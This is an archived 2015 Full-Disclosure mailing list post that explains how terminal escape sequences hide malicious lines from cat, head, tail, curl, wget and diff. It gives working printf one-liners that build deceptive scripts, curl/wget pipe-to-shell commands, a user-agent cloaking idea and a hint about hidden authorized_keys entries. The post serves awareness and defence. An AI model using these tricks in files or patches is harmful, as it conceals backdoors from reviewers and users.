| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20150917180523.89962w06kdnqeaww@webmail.alunos.dcc.fc.up.pt>
Date: Thu, 17 Sep 2015 18:05:23 +0200
From: up201407890@...nos.dcc.fc.up.pt
To: fulldisclosure@...lists.org
Subject: [FD] s/party/hack like it's 1999
Federico Bento <up201407890@...nos.dcc.fc.up.pt>
So recently i've encountered a post by Kurt Seifried of RedHat on
oss-sec's mailing list entitled "Terminal escape sequences - the new
XSS for admins?"
http://www.openwall.com/lists/oss-security/2015/08/11/8
This is a little misleading title, since escape sequences have been
introduced circa 70's, so it's actually not that new.
How it technically works:
A terminal escape sequence is a special sequence of characters that is
printed (like any other text).
If the terminal understands the sequence, it won't display the
character-sequence, but will perform some action.
While some people might already know what i'm going to present you,
the majority I believe doesn't, so this is mostly to raise awareness.
$ printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho
doing something very nice!\n' > backdoor.sh
$ chmod +x backdoor.sh
$ cat backdoor.sh
#!/bin/bash
echo doing something very nice!
$ ./backdoor.sh
doing something evil!
As you can see, our beloved 'cat' cheated on us. Why?
Because instead of displaying the character-sequence, the escape
sequence \033[XA (being X the number of times) performed some action.
And this action moves the cursor up X times, overwriting what is above
it X lines.
But this doesn't affect only 'cat', it affects everything that
interprets escape sequences.
$ head backdoor.sh
#!/bin/bash
echo doing something very nice!
$ tail backdoor.sh
#!/bin/bash
echo doing something very nice!
$ more backdoor.sh
#!/bin/bash
echo doing something very nice!
It's not over yet!
$ curl 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!
$ wget -qO - 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!
But if we pipe it into a shell...
$ curl -s 127.0.0.1/backdoor.sh|sh
doing something evil!
$ wget -qO - 127.0.0.1/backdoor.sh|sh
doing something evil!
You might be thinking "If I opened that in my browser, I would detect
it being malicious!"
Well, think again...
One can have all sorts of fun with user-agents, something that can
easily come to mind is verifying if the user-agent is from curl or wget,
and make them download the malicious file, if not,
redirect them to a legitimate file that looks like the original
output. Your browser would fool you then.
I wouldn't even be surprised if most of those install scripts that
make use of these 'pipe into sh' bullcrap abused this.
I wouldn't even be surprised if most of you were already pwned by
escape sequences in any situation at all.
Imagine the possibilities, from hidden ssh keys on your
authorized_keys to options hidden on your configuration files...
It's no secret, most of us rely on 'cat' to view files. I guess this
is one black kitty, giving you bad luck.
Here's another example with a .c file
$ printf '#include <stdio.h>\n\nint main()\n{\n\tprintf("doing
something evil\\n");\n\t/*\033[2A\n\t/* This simple program doesnt do
much... */\n\tprintf("doing something very nice\\n");\n\treturn
0;\n}\n' > nice.c
$ cat nice.c
#include <stdio.h>
int main()
{
/* This simple program doesnt do much... */
printf("doing something very nice\n");
return 0;
}
$ gcc nice.c
$ ./a.out
doing something evil
doing something very nice
'diff' also interprets escape sequences and so do the resulting patches
going back to the first example, imagine I have a backdoored.sh that
is backdoored, and a legit.sh that does what it's output tells us.
$ cat backdoor.sh #evil file
#!/bin/bash
echo doing something very nice!
$ cat legit.sh #actually echoes doing something very nice!
#!/bin/bash
echo doing something very nice!
$ diff -Naur backdoor.sh legit.sh
--- backdoor.sh 2015-09-17 16:25:42.985349535 +0100
+++ legit.sh 2015-09-17 16:26:14.950158635 +0100
@@ -1,4 +1,2 @@
#!/bin/bash
-echo doing something very nice!
+echo doing something very nice!
$ diff -Naur backdoor.sh legit.sh > file.patch
$ patch legit.sh -R file.patch
$ chmod +x legit.sh
$ ./legit.sh
doing something evil!
Hint:
'less' doesn't interpret escape sequences unless the -r switch is used,
so stop aliasing it to 'less -r' just because there's no colored output.
s/party/hack like it's 1999
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists